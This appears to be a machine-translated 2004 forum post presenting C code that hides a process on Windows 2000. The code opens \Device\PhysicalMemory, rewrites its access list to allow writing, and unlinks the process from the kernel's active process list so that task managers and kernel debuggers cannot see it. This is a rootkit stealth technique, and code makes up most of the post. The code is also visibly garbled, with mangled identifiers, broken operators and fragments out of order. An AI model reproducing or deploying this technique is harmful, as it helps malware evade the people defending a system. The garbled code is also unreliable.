A method of hiding a process under Windows 2000
【Key words: Win2000 Process hidden program entry: Zeng Source: huiyun.net Time: 2004-2-20 18:44:12 Click: 60 times
Last time I mentioned this, I felt it was so simple that there was nothing more to say, but some people asked me to write it up, so I will add a few words. Many posts have already analyzed methods such as API hooking and system-service hooking; thread injection has no process of its own, so that is not really "hiding". Here I describe a method of hiding completely under Windows 2000; it is very simple and contains no new idea. Before the explanation, a few structures must be mentioned first: the process executive block contains several process-related linked lists, one of which is the active process list. One of the important roles of this list is to traverse the currently active processes when system information is queried. Interestingly, M$ — possibly for efficiency reasons — does not use this list when switching threads: thread switching does not walk it (this is the basis of this program). It should further be said that this is an issue that should not be overlooked. What to do is then obvious: remove the process you want to hide from the doubly linked list of active processes, and even a kernel debugger (such as SoftICE / Proc) cannot find it.
The code for hiding the current process under Windows 2000 is as follows: #include
NULL) {FreeLibrary (g_hNtDLL);}} VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, ! NULL, NULL, & pDacl, NULL, & pSD) = ERROR_SUCCESS) {goto CleanUp;} ZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee .TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (! dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = ! SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL) = ERROR_SUCCESS) {goto CleanUp;} CleanUp: if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} HANDLE OpenPhysicalMemory () {NTSTATUS Status; unicode_string physmemstring; object_attributes attributes; rt lInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes. SecurityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZWOPENSECTION (&)
(! NT_SUCCESS (status); | g_hMPM, SECTION_MAP_READ SECTION_MAP_WRITE, & attributes)} if) {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4,0,0x30000,0x1000); if (g_pMapPhysicalMemory == NULL) {return NULL;} Return g_hmpm;} Pvoid LineTDRPHYS (Pulong Baseaddress, Pvoid Addr) {Ulong Vaddr = (Ulong) Addr, PGDE, PTE, Paddr; PGDE = BaseAddress [VADDR >> 22]; IF ((PGDE & 1)! = 0) {ulong TMP = PGDE & 0x00000080; if (tmp = 0!) {PAddr = (PGDE & 0xFFC00000) (vAddr & 0x003FFFFF);} else {PGDE = (ULONG) MapViewOfFile (g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG) PGDE) [(VADDR & 0x003FF000) >> 12]; IF ((PTE & 1)! = 0) {PADDR = (PTE & 0xFFFFFF000) (VADDR & 0x00000FFF); UnmapViewOffile (PVOID) PGDE);} else return 0;}} else return 0; return (PVOID) PAddr;} ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000 , 0x1000); if (TMP == 0) Return 0; Ulong Ret = TMP [(PHYS & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;} bool setdata (pvoid addr, ulong data) {Ulong Phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp == 0) return FALSE; tmp [ (PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); return true;} Bool HideProcessatall () {if (initntdll ()) {ix (OpenPhysicalMemory () == 0) {Return False;} ulong thread = GetData (PVOID) 0xffdff124); ulong process = getData (PVOID (Thread 0x22C)); Ulong FW = getData (PVOID (Process 0xA0)), BW = getData (PVOID (Process 0xA4)); setData (PVOID) FW 4), BW); SetData (PVOID (BW), FW);